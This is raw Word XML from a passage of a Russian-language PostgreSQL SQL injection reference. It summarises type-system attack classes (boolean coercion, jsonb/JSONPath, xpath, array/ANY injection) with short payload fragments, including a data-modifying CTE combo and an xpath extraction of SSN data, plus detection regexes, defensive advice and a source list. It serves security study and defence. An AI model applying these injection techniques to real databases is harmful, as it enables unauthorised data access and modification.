        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 (UNION)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — downstream leak в Payload A/B/D после взлома array-точки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29194133" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked queries)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параллельный класс ortogonal к 3.11.4. Combo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3.11.4 + 3.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возможно, но 3.5 в extended-protocol заблокировано (см. 3.5.x).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E71D04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.1 (Data-modifying CTE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>string_to_array(...) || (WITH ins AS (INSERT ...) SELECT id FROM ins)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комбо array-injection с DML через CTE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6550F3F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.2 (jsonb)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data-&gt;'arr' @&gt; '[1,2]'::jsonb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — containment в jsonb-context, аналог </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAC8945" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.3 (xpath)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xpath(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; обработка через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[i]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-subscript или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unnest()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пересечение с array-handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1B18E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 (Validation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практическая защита: typed array bind, whitelisted separator, schema-validation для query-string parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D96FAB6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> регекс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bstring_to_array\s*\(\s*['"][^'"]*['"]?\s*\|\|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (concat в string_to_array) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bANY\s*\(\s*ARRAY\s*\[</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> рядом с конкатенацией — нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> см. сводный regex категории 3.11 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.11.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441CD2B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CC6B9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Arrays</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — type спецификация.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D48EAD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Array Functions and Operators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — string_to_array, unnest, операторы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5165B8D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Row and Array Comparisons</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — ANY/ALL semantics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467099D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>psycopg3 docs: Adapting Python lists to PostgreSQL arrays</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — driver-уровневое маршалирование.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CAE4D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>asyncpg docs: Type conversion — arrays</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — asyncpg semantics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB9B8C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>pgjdbc docs: Array support</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JDBC array binding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F1F492" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection — in-list expansion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст IN-list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4055D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — ANY operator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практические payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2128DF10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари категории 3.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38021BC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В категории 3.11 разобраны четыре класса атак через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>систему типов PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — приёмы, где payload работает через семантику types и implicit coercion, а не через классические SQL-структуры. Это вторичные DSL-языки (JSONPath, XPath) и type-specific операторы (BOOLEAN cast, ARRAY containment), которые превращают одну injection-точку в несколько каналов утечки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EFF576" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.1 Boolean coercion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'$x'::boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> implicit cast: error-based leak через invalid-boolean-syntax, sanitizer-bypass через 12+ принимаемых литералов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'t'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'yes'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'on'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'1'</w:t>
      </w:r>
      <w:r>
        <w:t>, …), short-circuit-oracle через 200/500 HTTP-status. Три payload-карточки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A87FBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.2 jsonb -&gt; и -&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JSONB-операторы как точка инъекции: arbitrary key extraction (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data-&gt;&gt;'$user_path'</w:t>
      </w:r>
      <w:r>
        <w:t>), JSONPath injection (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data @@ '$.path == "value"'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) с полноценным DSL (рекурсивный спуск </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>like_regex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, фильтры </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), cast confusion </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(data-&gt;&gt;'k')::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 3.2. Три payload-карточки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463967A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.3 xpath() и XML-tricks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — XPath 1.0 injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xpath('$expr', xml_col)</w:t>
      </w:r>
      <w:r>
        <w:t>: прямое извлечение (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/private/ssn/text()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), blind oracle через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xpath_exists</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, computed-path в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xmltable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. XXE в PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>закрыт</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (CVE-2017-7484, XML_PARSE_NONET) — OOB-канал недоступен. Четыре payload-карточки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23494988" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.4 Array vs scalar: ANY($1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — driver-уровневое маршалирование scalar↔array + injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>string_to_array('$x', ',')</w:t>
      </w:r>
      <w:r>
        <w:t>. Containment-операторы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;@</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:t>) с user-controlled array literal. Driver-specific особенности psycopg/asyncpg/pgjdbc/pgx/node-postgres. Четыре payload-карточки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D96A92B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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9"/>
        <w:gridCol w:w="2319"/>
        <w:gridCol w:w="1792"/>
        <w:gridCol w:w="1775"/>
        <w:gridCol w:w="1715"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="3B82CED3"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7E4AA65"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A699B05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Точка инъекции</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06CB662" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Тип leak</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59D7D7B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Мин. привилегия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5E3B424" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Версии</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0DF0FE9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455756" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.11.1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343A30" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WHERE bool_col = '$x'</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A902E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>error / blind 200-vs-500</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E12BFD"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615B1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.x+ (все)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="29C60126"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64A4C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.11.2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1234AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>data-&gt;&gt;'$key'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> или </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>@@ '$.path'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7B5DF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>direct / blind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D0780A"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99F12D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.3+ (-&gt;&gt;); 12+ (jsonpath)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0E569FA4"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26D251" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.11.3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5F3A26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>xpath('$expr', xml_col)</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46C402" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>direct / blind boolean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DA5266" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC (xml column required)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97EC71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.3+ (все)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3CA339A7"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372255" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.11.4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2CE2DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
